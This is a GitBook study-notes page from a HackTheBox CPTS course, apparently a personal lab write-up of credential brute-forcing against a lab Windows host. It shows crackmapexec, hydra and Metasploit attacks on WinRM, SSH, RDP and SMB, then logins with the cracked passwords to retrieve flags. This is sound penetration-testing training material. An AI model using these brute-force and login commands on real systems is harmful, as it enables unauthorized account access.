z3tssu
  • README
  • Cybersecurity Certifications & Notes
    • Cybersecurity Knowledge Base
      • IPPSEC's Video Search for Hacking Methods
      • Finding Someone's Location with Seeker
      • Nishang Project
      • Hacktricks
    • 📜Certifications & Courses
      • 🟢Hackthebox - CPTS
        • Getting Started
          • General
          • Tmux
          • Vim
          • Service Scanning
        • Penetration Testing Process
        • Network Enumeration with Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving the Nmap Scanning Results
          • Service Enumeration
          • Nmap Scripting Engine
            • Update the Scripting Engine
            • Nmap Script Locations
          • Performance Tags
          • Firewall and IDS/IPS Evasion
        • 👣Footprinting
          • 🔎Host-Based Service Enumeration
            • FTP [21]
              • Basics
                • vsFTPd Detailed Output
                • Hiding IDs - YES
              • Footprinting FTP
                • Nmap FTP Script Scanning
                • Service Interaction
              • FTP Commands
            • SMB [139/445]
              • Basics
                • Default Configuration
                • Create and Manage Samba Share
                • smbstatus
              • Footprinting SMB
                • SMB Nmap Scan
                • Smbclient
                • RPCclient
                  • Useful Commands
                  • Basic Enumeration
                  • Enumerate Users
                  • Group Information
                  • Bruteforcing User RIDs
                • smbmap
                • CrackMapExec
                • Enum4Linux-ng
            • NFS [111,2049]
              • Basics
                • Default Configuration of NFS
                • Creating an NFS Entry
                • Dangerous Settings
              • Footprinting NFS
                • nmap
                  • Basic Scan
                  • NFS Script Scan
                • Mount an NFS Share
                • Unmount NFS
            • DNS [53]
              • Basics
                • DNS Records
                • Default Configuration
                • Dangerous Settings
              • Footprinting DNS
                • DIG - NS QUERY
                • DIG - Version Query
                • DIG - Any Query
                • DIG - AXFR Zone Transfer
                • DIG - AXFR Zone Transfer - Internal
                • Subdomain Bruteforcing (For Loop with Seclists)
                • Subdomain Bruteforce (DNSenum)
            • SMTP (25,587)
              • Telnet SMTP
                • Telnet - HELO/EHLO
                • Telnet - VRFY
                • Telnet - Send an Email
              • Nmap Telnet
              • FTP User Enumeration
            • IMAP/POP3 [110,995,143,993]
              • Default Configuration
            • SNMP[161]
            • MySQL [3306]
            • MSSQL [1433]
            • Oracle TNS [1521]
            • IPMI [623]
            • SSH [22]
            • Rsync [873]
            • R-Services [512, 513, 514]
            • RDP [3389]
            • WinRM [5985, 5986]
            • WMI [135]
          • Introduction
            • Enumeration Principles
            • Enumeration Methodology
          • Infrastructure Enumeration
            • Domain Information
            • Cloud Resource
            • Staff
        • 🕸️Web Information Gathering
          • 🤷‍♂️WHOIS
          • 🧬DNS
            • 🧬DIG
          • 📚Subdomain Enumeration
            • DNS Zone Transfer
            • Sub Domain Bruteforcing
            • Virtual Hosts
              • Gobuster vhosts brutefoce
              • Add Vhosts to /etc/hosts
            • Certificate Transparency Logs
          • 🖐️Fingerprinting
            • Banner Grabbing
            • Web Application Firewall (Wafw00f)
            • Nikto
          • Crawling
            • robots.txt
            • .Well-Known URIs
            • Popular Web-Crawlers
              • Scrapy (ReconSpider)
              • Apache Nutch (Scalable Crawler)
              • Burp Suite Spider
              • OWASP ZAP (ZED Attack Proxy)
          • 🔥Automating Recon
            • FinalRecon
          • 🔍Search Engine Discovery
            • 🔍Google Dorking
            • 🔍Search Operators
          • Web Archives
          • Questions
            • Question 4
            • Question 5
        • Vulnerability Assessment
          • Vulnerability Scanning Tools
            • Nessus
              • Installing and Starting Nessus
              • Nessus Scan Types
              • Nessus Polices
                • Creating a Nessus Policy
              • Nessus Plugins
                • Creating a Plugin Rule
              • Credentialed Scanning
                • HTB Credentials for Nessus
              • Exporting Nessus Scans
              • Scanning Issues
            • OpenVAS
              • Installing OpenVAS
              • OpenVAS Scan
              • Exporting Scans
            • Nexpose
            • Qualys
          • Security Assessments
          • Vulnerability Assessment
          • Assessment Standards
          • Common Vulnerability Scoring System (CVSS)
          • Common Vulnerabilities and Exposures (CVE)
            • Open Vulnerability Assessment Language (OVAL)
          • Reporting
        • 📂File Transfers
          • File Transfer Methods
            • Windows File Transfer Methods
              • ⬇️Download Operations
                • 🪟 PowerShell Base64 Encode & Decode
                • 🌐 PowerShell Web Downloads -
                • 📦 SMB Downloads
                • 🌐 FTP Downloads
              • ↗️Upload Operations
                • 🔐 Encode File Using PowerShell
                • 🌐 PowerShell Web Uploads
                • 🧬 PowerShell Base64 Web Upload
                • 🌐 SMB Uploads with WebDAV Twist
                • 📡 FTP Uploads
            • Linux File Transfer Methods
              • Download Operations
                • 📦 Base64 Encoding / Decoding for File Transfers
                • 🌐 Web Downloads with Wget and cURL
                • 💣 Fileless Attacks in Linux – Execute Directly
                • 🐚 Download with Bash using /dev/tcp
                • 🔐 SSH Downloads with scp
                  • More Usage on SCP
              • Upload Operations
                • 🌐 Web Upload with HTTPS 🚀
                • 🛠️ Quick Web File Transfer Method
                • 🔄 SCP Upload
            • Transferring Files with Code
              • Downloading Files
              • Uploading Files
            • Transfer Files with Netcat, Ncat, RDP
            • Powershell Session File Transfer
            • RDP File Transfer
            • Protected File Transfers
            • Sending Files over HTTP/S
            • Upload and Download with Built in OS Tools
          • Detect or Be Detected
            • Detection
            • Evade Detection
        • 🐚Shells & Payloads
          • The Shell Basics
            • Bind Shell
            • Reverse Shell
          • Creating Payloads
            • Introduction to Payloads
            • Metasploit Payloads
            • Crafting Payloads with MSFvenom
          • Infiltrating Windows
            • 🛠️ MS17-010 EternalBlue
          • Infiltrating Unix/Linux
            • 🐍 Spawning a TTY Shell with Python
            • Spawing Interactive Shells
          • Web Shells
            • 🧪 Laudanum – "One Web Shell to Rule Them All"
            • 🧠 Antak Webshell + ASPX Concepts
            • 🐘 PHP Web Shells
            • Shells & Payloads - The Live Engagement
          • Detection and Prevention
        • 👾Metasploit
          • Introduction
            • 🧰 Introduction to Metasploit Framework (MSF)
            • MSF Engagement Structure
          • MSF Components
            • 🧰 Modules
            • 🎯 Targets
            • 🧠 Payloads
            • 🔧 Encoders?
            • 🗄️ Database
            • 🔌 Plugins
          • MSF Sessions
            • 🔁 Sessions
            • 🛠️ Meterpreter
          • Additional Features
            • 🛠️ Installing & Importing Custom Metasploit Modules
            • 🧠 Porting Scripts into Metasploit Modules
            • 💥 Introduction to MSFVenom
            • 🛡️ Firewall and IDS/IPS Evasion
        • ⚔️Password Attacks
          • Where Credentials are Stored?
          • John The Ripper
          • Remote Password Attacks
            • 🖥️ Network Services
              • WinRM [5985, 5986]
              • SSH [22]
              • RDP [3389]
              • SMB [139,445]
              • Questions
            • 🔐 Password Mutations & Wordlist Generation
            • 🔐 Password Reuse & Default Passwords
          • Windows Local Password Attacks
            • Attacking SAM (Security Account Manager)
            • Attacking LSASS
      • TCM Security - PNPT
      • Cisco Ethical Hacker
      • Introduction to Hacking Methodology
    • Pentesting Services
    • Pentesting Web
      • CBBH
      • TCM Security - Practical Web Hacking
    • Pentesting Wi-Fi
      • OSWP
      • Wireless Penetration Test (WPA2)
    • Pentesting Cloud
    • Network Defense
      • Blue Team Level 1
    • 🐍Scripting with Python
    • ☢️Active Directory Penetration Testing
      • Initial Attack Vectors
      • Post Compromise Enumeration
    • Cybersecurity Job Skills
      • Information Security Officer Guide
    • 🔍IP Address Investigation
      • WHOIS
      • Reverse DNS
      • Geolocation of the IP
      • Check If IP is Active and has Services Running
      • Check the IP Reputation
      • Check Passive DNS History
      • Confirm the Actual Server Location
    • Cybersecurity Projects
      • Wireless Penetration Test (WPA2)
      • AWS Honeypot
      • SOC Analyst Home Lab
      • Threat Management with Wazuh SIEM
    • Cybersecurity Books
    • 🔄SOC
  • IT Certifications & Notes
    • Certifications
      • MS-900 Microsoft 365 Fundamentals
        • Describe Microsoft security and compliance capabilities
          • Describe the functions and identity types of Microsoft Entra ID
          • Describe access management capabilities of Microsoft Entra
            • Introduction
            • Describe Conditional Access
            • Describe Global Secure Access in Microsoft Entra
            • Describe Microsoft Entra roles and role-based access control (RBAC)
      • CISSP
      • ITIL
        • ITIL 4 Foundations
      • CCNA
        • David Bombal - Udemy
        • CCNA Training - Jeremy's IT Lab
          • Resources
          • Cisco Packet Tracer Labs
            • Cisco Packet Tracer Overview
            • Packet Tracer Lab 1
      • MCSE Certification Options
      • AZ-900
    • IT Projects & Training
      • Windows Server 2016 - Active Directory Lab Build
      • Windows Server 2022 Fundamentals
        • Introduction to Server Manager
          • Installing and Configuring Server Manager
          • Creating a VM on Microsoft Azure for Server 2022
        • Introduction to Active Directory
          • Active Directory and Setting up
          • Active Directory Overview
          • Delegation Rights for Active Directory
          • Active Directory Administrative Center
          • Common cmd commands for IT Support
        • Group Policy Management
          • How to apply basic GPO
        • Introduction to Share Folders
          • Creating Share Folders on Server Manager
          • Share Folder Permissions for Users
          • Map a Network Drive (locally)
          • Map a Network Drive through Active Directory
        • Understanding Windows/Common AD Issues
          • Installing RSAT Tools
          • Joining a PC to the Domain
        • Real Life IT Support Issues
          • When a User Gets locked out their accounts
          • Change Password of a User
      • Office 365 For IT Support
        • Office 365 Overview
      • Microsoft Azure Training
        • Getting Started in the Azure Portal
        • Introduction to Microsoft Azure Services
        • Basic Usage of Azure Services
        • Azure Deploy Sql Database Overview
        • Azure AD Connect Overview
        • Azure Microsoft File Share/Map Drives
        • Deploy Windows 11 to Azure
        • Microsoft Azure Basic Fundamentals (Azure Active Directory)
        • Introduction to Vnet (Overview)
        • Microsoft Azure Network/Security
        • Microsoft Azure Tagging (Final Course)
      • Networking Projects with Cisco Packet Tracer
        • Build a Basic Network
        • Webserver Project
      • Setup and Router and Switch
    • IT Knowledge Base
  • CTF/Box WRITEUPS
    • Tryhackme
    • HTB
      • Footprinting Lab - Easy
      • Footprinting Lab - Medium
      • Footprinting Lab - Hard
      • Nessus Skills Assessment
      • OpenVAS Skills Assessment
      • Tier 0
      • Tier 1
  • Cryptocurrency/Blockchain
    • Cryptocurrency Investigation
    • Certifications
      • Certified Blockchain Security Professional
Powered by GitBook
On this page
  • Question 1
  • Question 2
  • Question 3
  • Question 4
  1. Cybersecurity Certifications & Notes
  2. Certifications & Courses
  3. Hackthebox - CPTS
  4. Password Attacks
  5. Remote Password Attacks
  6. 🖥️ Network Services

Questions

Question 1

Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

  1. nmap scan

Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
3389/tcp open  ms-wbt-server

  1. winrm bruteforce

┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec winrm 10.129.91.93 -u username.list -p password.list            
SMB         10.129.91.93    5985   WINSRV           [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP        10.129.91.93    5985   WINSRV           [*] http://10.129.91.93:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:123456
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:12345
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:123456789
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:batman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:password
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:iloveyou
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [-] WINSRV\john:princess
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.91.93    5985   WINSRV           [+] WINSRV\john:november (Pwn3d!)

  1. Login with Evil-winrm

evil-winrm -i ipaddress -u username -p password

  1. Navigate to 

C:\Users\john\Desktop\f

  1. Find the flag there:

type flag.txt

Question 2

  1. Bruteforce SSH login with Hydra

hydra -L username.list -P password.list ssh://ip_address
┌──(root㉿kali)-[/home/kali/Downloads]
└─# hydra -L username.list -P password.list ssh://10.129.91.93
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-19 06:44:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ssh://10.129.91.93:22/
[22][ssh] host: 10.129.91.93   login: dennis   password: rockstar
[STATUS] 1009.00 tries/min, 1009 tries in 00:01h, 20105 to do in 00:20h, 14 active

  1. Connect to SSH

ssh dennis@ip_address -P rockstar

  1. got access

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

dennis@WINSRV C:\Users\dennis>

  1. Find flag


dennis@WINSRV C:\Users\dennis> dir C:\flag.txt /s /p 
 Volume in drive C has no label. 
 Volume Serial Number is 2683-3D37

 Directory of C:\Users\dennis\Desktop 

01/05/2022  09:39 AM                15 flag.txt
               1 File(s)             15 bytes

  1. Found

dennis@WINSRV C:\Users\dennis> cd Desktop 

dennis@WINSRV C:\Users\dennis\Desktop>dir 
 Volume in drive C has no label. 
 Volume Serial Number is 2683-3D37

 Directory of C:\Users\dennis\Desktop

01/05/2022  09:16 AM    <DIR>          .
01/05/2022  09:16 AM    <DIR>          ..
01/05/2022  09:39 AM                15 flag.txt
               1 File(s)             15 bytes
               2 Dir(s)  26,292,985,856 bytes free

dennis@WINSRV C:\Users\dennis\Desktop>type flag.txt 
HTB{Let5R0ck1t}

Question 3

  1. Crack the SMB service credential

hydra -L username.list -P password.list rdp://ip_address

chris:789456123

  1. Authenticate on service

┌──(root㉿kali)-[/home/kali/Downloads]
└─# xfreerdp3 /v:10.129.91.93 /u:chris /p:789456123

Question 4

  1. Bruteforce the password

hydra -L username.list -P password.list smb://ip_address

We get an error

┌──(root㉿kali)-[/home/kali/Downloads]
└─# hydra -L username.list -P password.list smb://10.129.91.93
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-19 07:04:19
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 21112 login tries (l:104/p:203), ~21112 tries per task
[DATA] attacking smb://10.129.91.93:445/
[ERROR] invalid reply from target smb://10.129.91.93:445/

  1. Lets try with Metasploit SMB Login

msfconsole -q 
┌──(root㉿kali)-[/home/kali/Downloads]
└─# msfconsole -q
msf6 > search SMB Login

Matching Modules
================

   #   Name                                                Disclosure Date  Rank       Check  Description
   -   ----                                                ---------------  ----       -----  -----------
   0   exploit/windows/smb/ms04_007_killbill               2004-02-10       low        No     MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
   1   exploit/windows/smb/smb_relay                       2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   2     \_ action: CREATE_SMB_SESSION                     .                .          .      Do not close the SMB connection after relaying, and instead create an SMB session
   3     \_ action: PSEXEC                                 .                .          .      Use the SMB Connection to run the exploit/windows/psexec module against the relay target
   4     \_ target: Automatic                              .                .          .      .
   5     \_ target: PowerShell                             .                .          .      .
   6     \_ target: Native upload                          .                .          .      .
   7     \_ target: MOF upload                             .                .          .      .
   8     \_ target: Command                                .                .          .      .
   9   exploit/windows/smb/ms17_010_eternalblue            2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   10    \_ target: Automatic Target                       .                .          .      .
   11    \_ target: Windows 7                              .                .          .      .
   12    \_ target: Windows Embedded Standard 7            .                .          .      .
   13    \_ target: Windows Server 2008 R2                 .                .          .      .
   14    \_ target: Windows 8                              .                .          .      .
   15    \_ target: Windows 8.1                            .                .          .      .
   16    \_ target: Windows Server 2012                    .                .          .      .
   17    \_ target: Windows 10 Pro                         .                .          .      .
   18    \_ target: Windows 10 Enterprise Evaluation       .                .          .      .
   19  exploit/windows/smb/smb_shadow                      2021-02-16       manual     No     Microsoft Windows SMB Direct Session Takeover
   20  auxiliary/scanner/smb/smb_login                     .                normal     No     SMB Login Check Scanner
   21  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt       .                normal     No     SMB NTLMv1 Login Request Corruption
   22  exploit/multi/http/pgadmin_session_deserialization  2024-03-04       excellent  Yes    pgAdmin Session Deserialization RCE


Interact with a module by name or index. For example info 22, use 22 or use exploit/multi/http/pgadmin_session_deserialization

msf6 > use 20
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE password.list
PASS_FILE => password.list
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE username.list 
USER_FILE => username.list
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.129.91.93
RHOSTS => 10.129.91.93
msf6 auxiliary(scanner/smb/smb_login) > run

[+] 10.129.91.93:445      - 10.129.91.93:445 - Success: 
'.\cassie:12345678910'

  1. Accessing SMB File Shares

                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient -U cassie -L \\\\10.129.91.93\\

Password for [WORKGROUP\cassie]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        CASSIE          Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.91.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient -U cassie \\\\10.129.91.93\\CASSIE  

Password for [WORKGROUP\cassie]:
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
mkfifo         more           mput           newer          notify         
open           posix          posix_encrypt  posix_open     posix_mkdir    
posix_rmdir    posix_unlink   posix_whoami   print          prompt         
put            pwd            q              queue          quit           
readlink       rd             recurse        reget          rename         
reput          rm             rmdir          showacls       setea          
setmode        scopy          stat           symlink        tar            
tarmode        timeout        translate      unlock         volume         
vuid           wdel           logon          listconnect    showconnect    
tcon           tdis           tid            utimes         logoff         
..             !              
smb: \> ls
  .                                  DR        0  Sat Apr 19 06:27:37 2025
  ..                                 DR        0  Sat Apr 19 06:27:37 2025
  desktop.ini                       AHS      282  Thu Jan  6 09:44:52 2022
  flag.txt                            A       16  Thu Jan  6 09:46:14 2022
  uKDFSxqTZk                          D        0  Sat Apr 19 06:27:37 2025clo

                10328063 blocks of size 4096. 6410885 blocks available
smb: \>  get flag.txt
getting file \flag.txt of size 16 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
PreviousSMB [139,445]Next🔐 Password Mutations & Wordlist Generation

Last updated 1 month ago

📜
🟢
⚔️